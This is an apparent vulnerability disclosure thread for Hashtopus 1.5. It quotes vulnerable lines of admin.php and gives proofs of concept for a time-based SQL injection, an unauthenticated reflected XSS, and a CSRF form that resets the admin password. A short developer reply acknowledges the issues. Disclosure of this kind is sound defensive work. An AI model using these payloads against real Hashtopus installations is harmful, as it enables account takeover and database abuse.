Hashtopus 1.5 Multiple Vulnerabilities

[ghost]

SQL Injection (authenticated)
A SQL Injection is present in admin.php on line 1425:

     $format=$_POST["format"];
[...]
          $vysledek=mysqli_query_wrapper($dblink,"INSERT INTO hashlists (name,format,hashtype) VALUES ('$name',$format,$hashtype)");

Proof of concept:

POST /hashtopus/admin.php?a=newhashlistp HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: PHPSESSID=<valid_session_id>
Connection: close

name=ASD&format=0 or SLEEP(10)

Reflective XSS (unauthenticated)
An unauthenticated reflective cross-site scripting is present on line 2826 in admin.php:

[…]
name=\"return\" value=\"".$_SERVER['QUERY_STRING']." 
[...]

Proof of concept:
/hashtopus/admin.php?"><script>alert(123);</script>

CSRF (Change admin password to login)
Cross-site request forgery protection is not available on sensitive forms.

<script>history.pushState('', '', '/')</script>
    <form action="http://localhost/hashtopus/admin.php?a=config" method="POST">
      <input type="hidden" name="password" value="0wn3d" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>

[curlyboi]

Hi. I didn't really bother with admin.php as long as user is authenticated...

[curlyboi]

But with the rest you are right :)